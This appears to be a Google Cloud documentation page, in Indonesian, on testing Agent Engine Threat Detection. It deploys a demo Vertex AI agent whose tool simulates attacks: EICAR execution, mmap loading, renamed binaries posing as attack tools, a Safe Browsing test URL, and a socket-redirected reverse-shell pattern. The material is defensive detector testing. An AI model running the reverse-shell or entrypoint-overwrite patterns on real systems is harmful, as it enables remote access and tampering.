Halaman ini menjelaskan cara memverifikasi bahwa Deteksi Ancaman Agent Engine berfungsi dengan memicu detektor secara sengaja dan memeriksa temuan. Deteksi Ancaman Agent Engine adalah layanan bawaan Security Command Center.
Sebelum memulai
Untuk mendeteksi potensi ancaman terhadap agen Vertex AI Agent Engine, pastikan bahwa layanan Deteksi Ancaman Agent Engine diaktifkan di Security Command Center.
Lingkungan penyiapan
Untuk menguji Deteksi Ancaman Agent Engine, siapkan agen demo yang mensimulasikan aktivitas berbahaya.
Membuat project dan mengaktifkan shell
Pilih atau buat Google Cloud project untuk digunakan dalam pengujian.
Untuk menguji detektor, Anda dapat menggunakan Google Cloud konsoldan Cloud Shell.
Buka Google Cloud konsol.
Pilih project yang akan Anda gunakan untuk pengujian.
Klik Aktifkan Cloud Shell.
Anda juga dapat menjalankan petunjuk pengujian dari shell lokal.
Menyiapkan Vertex AI Agent Engine
Jika Anda belum pernah menggunakan Vertex AI Agent Engine di project ini, Siapkan lingkungan Vertex AI Agent Engine sebelum memulai. Catat nama bucket Cloud Storage staging yang Anda buat. Sebaiknya ikuti panduan memulai Vertex AI Agent Engine untuk mempelajari cara mengembangkan dan men-deploy agen dengan Vertex AI SDK.
Membuat skrip pengujian
Anda akan membuat beberapa file yang akan digunakan untuk men-deploy agen baru untuk pengujian. Gunakan editor teks untuk melakukannya, seperti nano.
Buat file baru bernama
requirements.txtdengan konten berikut.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticBuat file kosong baru bernama
installation_scripts/install.sh. Beberapa pengujian mengharuskan penambahan konten ke file ini.Buat file baru bernama
main.py, dengan konten berikut. Ganti variabelPROJECT_ID,LOCATION, danSTAGING_BUCKET. Nama bucket staging harus menyertakan awalangs://.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Menyiapkan lingkungan virtual
Buat dan aktifkan lingkungan virtual Python.
python3 -m venv env source env/bin/activateInstal dependensi yang diperlukan di lingkungan virtual.
pip install -r requirements.txt
Menguji skrip
Jalankan skrip dari dalam lingkungan virtual dengan python3 main.py.
Perintah ini akan memerlukan waktu beberapa menit untuk membangun, men-deploy, dan menjalankan agen pengujian.
Skrip ini menampilkan nama resource agen yang di-deploy, dan beberapa objek JSON termasuk respons LLM dan metadata lainnya. Jika Anda mengalami error izin atau error deployment pada tahap ini, lihat pemecahan masalah untuk langkah berikutnya.
Menguji detektor
Untuk menguji detektor Deteksi Ancaman Agent Engine, ganti kode dalam fungsi threat_detection_test dengan kode yang mensimulasikan serangan. Skrip dapat memerlukan waktu lama untuk men-deploy dan membuat kueri agen. Untuk mempercepat pengujian, Anda dapat menggabungkan konten beberapa fungsi ini.
Eksekusi: Biner Berbahaya Ditambahkan Dieksekusi
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Eksekusi: Koleksi Berbahaya Ditambahkan Dimuat
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian. Anda mungkin menerima error dari Vertex AI SDK tentang penguraian respons, tetapi temuan tetap dibuat.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Eksekusi: Container Escape
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Eksekusi: Eksekusi Alat Serangan Kubernetes
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Eksekusi: Eksekusi Alat Pengintaian Lokal
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Eksekusi: Biner Berbahaya Dimodifikasi Dieksekusi
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Eksekusi: Koleksi Berbahaya Dimodifikasi Dimuat
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
URL Berbahaya Teramati
Perbarui file installation_scripts/install.sh dengan konten berikut.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Reverse Shell
Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
Langkah berikutnya
- Pelajari lebih lanjut Deteksi Ancaman Agent Engine.
- Pelajari cara me nggunakan Deteksi Ancaman Agent Engine.